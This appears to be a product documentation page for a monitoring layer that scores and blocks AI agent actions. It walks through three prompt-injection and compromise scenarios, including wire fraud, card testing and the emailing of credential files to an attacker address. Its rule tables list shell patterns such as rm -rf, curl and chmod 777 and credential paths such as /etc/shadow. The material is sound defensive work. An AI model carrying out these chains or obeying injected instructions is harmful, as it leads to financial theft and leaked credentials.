
Actions, Risks & Threats

Every agent action is normalized, scored, and routed through a deterministic risk pipeline. Here's what we detect, how we score it, and what happens when an attack chain unfolds.

20+1 Domains · 10 Groups · 9 Risk Flags · 5 Tiers
Minimal / Low -- auto-allow
Medium -- agent reviewer (Human or Deny)
High -- human-in-the-loop required
Critical -- deny (blocked)
Today, only Email domain actions are live. The rest of this taxonomy is published as our reference taxonomy — implementation will follow, prioritized by demand.
Risk Scoring Engine

9 Risk Flags

Multiple flags fire simultaneously. Each carries a base weight. Three categories: Data, Power, Control.

10 Amplifier Dimensions

Weights sum to 1.0. Context shapes the final score. Three are multiplicative: destination, boundary, irreversibility.

Session-Aware Threat Detection

Attack chains caught in real time.

Individual actions may look benign. permit0 watches the session as a whole and fires immutable block rules when attack patterns emerge.

Attack Scenarios — Step by Step

Three real attacks. Three different blocks.

Each example shows an AI agent being exploited — and how the scoring pipeline catches the attack before damage occurs.

🏦 Demo 1: APP Fraud — Scatter Transfer
Procurement agent tricked into wiring to 6 fraudulent vendors
Status: blocked

Scenario: A procurement agent receives fake supplier invoices via prompt injection. Each wire looks like a legitimate invoice payment to a foreign vendor.

1. payments.transfer → GBP 12,000 to Vendor Alpha Ltd (UK)
   Score: 0.42 — MEDIUM tier. Routed to agent reviewer. Reviewer: plausible procurement. Decision: Human.
   FINANCIAL · OUTBOUND · MUTATION
2. payments.transfer → EUR 8,500 to Berlin Components GmbH (DE)
   Score: 0.45 — MEDIUM tier. Session rule fires: record_count > 1. Scope +6, amount +4.
   FINANCIAL · OUTBOUND
3. payments.transfer → EUR 15,000 to Lyon Fabrication SARL (FR)
   Score: 0.52 — MEDIUM tier escalating. 3 distinct recipients now tracked. Cumulative: EUR 35,500.
   FINANCIAL · GOVERNANCE
4. payments.transfer → CHF 22,000 to Swiss Precision AG (CH)
   Score: 0.61 — HIGH tier. Human-in-the-loop required. 4 distinct recipients, 4 different currencies.
   FINANCIAL · GOVERNANCE · OUTBOUND
5. payments.transfer → SGD 9,500 to SG Microelectronics Pte (SG)
   Score: 0.68 — HIGH tier. 5 distinct recipients in under 45 minutes. Approaching scatter threshold.
   FINANCIAL · GOVERNANCE
6. payments.transfer → AED 18,000 to Gulf Trading FZE (UAE)
   BLOCKED by scatter_transfer rule. 6 distinct recipients within 60 minutes = APP fraud pattern.
   FINANCIAL · SESSION BLOCK

Block rule: scatter_transfer()
Fires when session contains 6+ distinct recipients within a 60-minute window. Designed to catch Authorized Push Payment (APP) fraud where agents are socially engineered into paying fake invoices across multiple accounts.

💳 Demo 2: Card Testing Attack
Compromised checkout agent probes card validity with micro-charges
Status: blocked

Scenario: A checkout agent has been compromised. It rapid-fires micro-charges (<$2) to distinct customers to probe for valid card numbers before attempting larger fraudulent charges.

1. payments.charge → $0.50 to cus_alice_001
   Score: 0.28 — LOW tier. Small amount, known customer. Auto-allowed.
   FINANCIAL · MUTATION
2. payments.charge → $0.75 to cus_bob_002
   Score: 0.31 — LOW tier. Second micro-charge. Still within normal range.
   FINANCIAL
3. payments.charge → $1.00 to cus_carol_003
   Score: 0.48 — MEDIUM tier. Session rule fires: record_count > 2. Scope +24, amount +22, sensitivity +18.
   FINANCIAL · GOVERNANCE
4. payments.charge → $0.50 to cus_dave_004
   Score: 0.62 — HIGH tier. 4 distinct customers in rapid succession. Human approval required.
   FINANCIAL · GOVERNANCE
5. payments.charge → $1.00 to cus_eve_005
   BLOCKED by card_testing rule. 5 micro-charges (<$2) to distinct customers within 10 minutes.
   FINANCIAL · SESSION BLOCK

Block rule: card_testing()
Fires when 5+ micro-charges (<$2) hit distinct customers within a 10-minute window. Prevents fraud rings from probing card validity through a compromised payment agent.
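
The scatter_transfer and card_testing rules described above are both "N distinct parties inside a sliding time window" checks. The sketch below is an added example, not permit0's own code: the class, the function first_block and the timestamps in the two constructed sessions are assumptions, while the thresholds and windows come from the rule descriptions.

```python
from collections import deque
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class DistinctWindowRule:
    """Fires when `threshold` distinct parties are seen inside a sliding window."""
    action: str                          # action type the rule watches
    threshold: int                       # distinct parties that trigger the block
    window_s: int                        # window length in seconds
    max_amount: Optional[float] = None   # if set, only count amounts below this
    events: deque = field(default_factory=deque)  # (timestamp, party) pairs

    def observe(self, ts, action, party, amount):
        """Record one attempted action; return True if it must be blocked."""
        if action != self.action:
            return False
        if self.max_amount is not None and amount >= self.max_amount:
            return False
        # Attempts are recorded even when blocked: a denied attempt is still evidence.
        self.events.append((ts, party))
        while ts - self.events[0][0] > self.window_s:   # evict expired events
            self.events.popleft()
        return len({p for _, p in self.events}) >= self.threshold

def scatter_transfer():   # 6+ distinct recipients within 60 minutes
    return DistinctWindowRule("payments.transfer", 6, 60 * 60)

def card_testing():       # 5+ charges under $2 to distinct customers within 10 minutes
    return DistinctWindowRule("payments.charge", 5, 10 * 60, max_amount=2.00)

def first_block(rule, session):
    """Return the 1-based step at which the rule blocks, or None if it never fires."""
    for step, (ts, action, party, amount) in enumerate(session, 1):
        if rule.observe(ts, action, party, amount):
            return step
    return None

# Constructed sessions following Demo 1 and Demo 2; the timestamps are assumed.
DEMO1 = [(i * 480, "payments.transfer", who, amt) for i, (who, amt) in enumerate([
    ("Vendor Alpha Ltd", 12000), ("Berlin Components GmbH", 8500),
    ("Lyon Fabrication SARL", 15000), ("Swiss Precision AG", 22000),
    ("SG Microelectronics Pte", 9500), ("Gulf Trading FZE", 18000)])]
DEMO2 = [(i * 60, "payments.charge", who, amt) for i, (who, amt) in enumerate([
    ("cus_alice_001", 0.50), ("cus_bob_002", 0.75), ("cus_carol_003", 1.00),
    ("cus_dave_004", 0.50), ("cus_eve_005", 1.00)])]

if __name__ == "__main__":
    print("scatter_transfer blocks at step", first_block(scatter_transfer(), DEMO1))
    print("card_testing blocks at step", first_block(card_testing(), DEMO2))
```

Counting distinct parties rather than raw events is what keeps repeated payments to one known payee from tripping the rule.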

🔓 Demo 3: Insider Exfiltration Chain
Prompt injection redirects agent to steal credentials and email them externally
Status: blocked

Scenario: A task agent is asked to "summarize the app config." A prompt injection in a document redirects it to read credential files and email them to an external address.

1. files.read → /app/README.md
   Score: 0.08 — MINIMAL tier. Benign documentation file. Auto-allowed.
   MUTATION
2. files.read → /app/config/credentials.json
   Score: 0.48 — MEDIUM tier. Sensitive file detected. EXPOSURE flag fires. Sensitivity +20.
   EXPOSURE · GOVERNANCE
3. files.read → /app/.env.production
   Score: 0.51 — MEDIUM tier. Second credential file. EXPOSURE flag sequence building in session context.
   EXPOSURE
4. email.send → attacker@external-domain.com (with credential summary)
   BLOCKED by read_then_exfiltrate rule. External email send detected after EXPOSURE flags in recent session history.
   OUTBOUND · EXPOSURE · SESSION BLOCK

Block rule: read_then_exfiltrate()
Fires when an external email send is attempted after recent EXPOSURE-flagged actions in the same session. Interrupts data exfiltration chains before credentials escape the perimeter.
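
The read_then_exfiltrate chain, sketched as an added example that is not permit0's own code. The Session class, the path regex, the internal domain corp.example and the reading of "recent" as the last 5 actions are all assumptions made for illustration; the sensitive paths are the ones listed in the page's files.read table.

```python
import re
from collections import deque

# Paths from the page's files.read table; the regex itself is an assumption.
SENSITIVE = re.compile(
    r"(^|/)(\.env(\.[\w.-]+)?|credentials\.json)$|^/etc/(shadow|passwd)$")
INTERNAL_DOMAINS = {"corp.example"}  # assumed organisation mail domain
RECENT = 5                           # assumed: "recent" = the last 5 actions

class Session:
    """Keeps the flag sets of the last RECENT actions and applies the chain rule."""
    def __init__(self):
        self.history = deque(maxlen=RECENT)

    def evaluate(self, action, target):
        """Return (decision, flags) for one action, then record it."""
        flags, decision = set(), "no_block"
        if action == "files.read" and SENSITIVE.search(target):
            flags.add("EXPOSURE")          # read is allowed, but primes the detector
        elif action == "email.send":
            domain = target.rsplit("@", 1)[-1].lower()
            if domain not in INTERNAL_DOMAINS:
                flags.add("OUTBOUND")
                if any("EXPOSURE" in past for past in self.history):
                    decision = "block:read_then_exfiltrate"
        self.history.append(flags)
        return decision, flags

def run(actions):
    """Evaluate a whole session and return the per-step decisions."""
    session = Session()
    return [session.evaluate(action, target)[0] for action, target in actions]

# Constructed session following Demo 3.
DEMO3 = [("files.read", "/app/README.md"),
         ("files.read", "/app/config/credentials.json"),
         ("files.read", "/app/.env.production"),
         ("email.send", "attacker@external-domain.com")]

if __name__ == "__main__":
    for (action, target), decision in zip(DEMO3, run(DEMO3)):
        print(action, target, "->", decision)
```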
Action Policy Deep Dives

Context changes everything.

The same action type can score anywhere from MINIMAL to CRITICAL depending on entities, session history, and environment.

🏦 payments.transfer critical
Flags: FINANCIAL (primary) · OUTBOUND (primary) · MUTATION (secondary)
Amplifiers: amount(18) · scope(10) · irreversibility(14) · destination(20) · boundary(10) · sensitivity(8)
| Context | Effect | Why |
|---|---|---|
| Amount < $1,000 | medium | Low financial magnitude. Amount dimension stays moderate. |
| Amount $1K-$10K | high | Amount +12. Requires human sign-off. |
| Amount > $10K | gate | Amount +25. Hard gate — always human approval. |
| Amount > $250K | block | Exceeds session cumulative limit. Denied outright. |
| Cross-currency (e.g., USD → CHF) | upgrade | Boundary +8. Cross-region = unfamiliar destination risk. |
| Recipient not in approved payee list | upgrade | Destination +14. Unknown payee requires verification. |
| Production environment | upgrade | Environment override to 15. Real money at stake. |
Session-aware: 6+ distinct recipients in 60 min → scatter_transfer block. Cumulative > $500K → session cap. Preceded by iam.assign_role → privilege_escalation_then_large_transfer block.
💳 payments.charge critical
Flags: FINANCIAL (primary) · OUTBOUND (primary) · MUTATION (secondary)
Amplifiers: amount(12) · scope(8) · irreversibility(10) · destination(15) · boundary(8)
| Context | Effect | Why |
|---|---|---|
| Amount < $100 | allow+log | Low amount. Stays in MEDIUM tier range. |
| Amount $100-$1,000 | approval | Amount +12. Human sign-off required. |
| Amount > $1,000 | gate | Amount +25. Hard gate — never auto-approves. |
| New/unknown customer | upgrade | Destination +14, actor +10. Unknown = higher risk. |
| Currency ≠ org default | upgrade | Boundary +8. Cross-currency = cross-region risk. |
Session-aware: 5+ micro-charges (<$2) to distinct customers in 10 min → card_testing block. record_count > 2 → scope +24, amount +22, sensitivity +18.
✉️ email.send high
Flags: OUTBOUND (primary) · EXPOSURE (primary) · MUTATION (secondary)
| Context | Effect | Why |
|---|---|---|
| Recipient: internal domain | downgrade | Reduce destination + boundary. Internal = lower risk. |
| Recipient: external domain | upgrade | Destination +14. Crossing trust boundary. |
| Body contains credentials/keys | gate | Sensitivity +20. Promote EXPOSURE flag. Possible exfiltration. |
| 50+ recipients (BCC) | gate | Scope +25. Add GOVERNANCE flag. Mass mailing. |
| Send rate > 20/min | gate | Volume +18. Bulk exfiltration pattern. |
Session-aware: Preceded by EXPOSURE-flagged file reads → read_then_exfiltrate block. Rate > 20/min → bulk_external_send block. Sensitivity +12, destination +8 if file reads in last 5 actions.
📁 files.read low
Flags: MUTATION (secondary, default only)
| Context | Effect | Why |
|---|---|---|
| Path: documentation, README | allow | Benign content. No flag escalation. |
| Path: .env, credentials.json | upgrade | Add EXPOSURE + GOVERNANCE flags. Sensitivity +20. |
| Path: /etc/shadow, /etc/passwd | gate | System credentials. EXPOSURE + GOVERNANCE. Hard gate. |
| Path matches PII patterns | upgrade | EXPOSURE secondary flag. Sensitivity escalation. |
Session-aware: Reading credential files sets the EXPOSURE flag in session context. If followed by email.send to external domain → read_then_exfiltrate fires. The read alone is allowed, but it primes the chain detector.
⚙️ process.shell high
Flags: EXECUTION (primary) · MUTATION (primary)
| Context | Effect | Why |
|---|---|---|
| Contains rm -rf, shred, truncate | gate | Add DESTRUCTION flag. Irreversibility +10. Catastrophic. |
| Contains curl, wget, scp | upgrade | Add OUTBOUND flag. Destination +15, boundary +8. |
| Contains sudo, chmod 777 | gate | Add PRIVILEGE flag. Scope +15, actor +10. |
| Contains password, token, key | gate | Add EXPOSURE flag. Sensitivity +20. |
Session-aware: If preceded by iam.assign_role within last 3-5 actions → privilege_escalation_then_exec block. Pattern: escalate privileges then execute code = caught.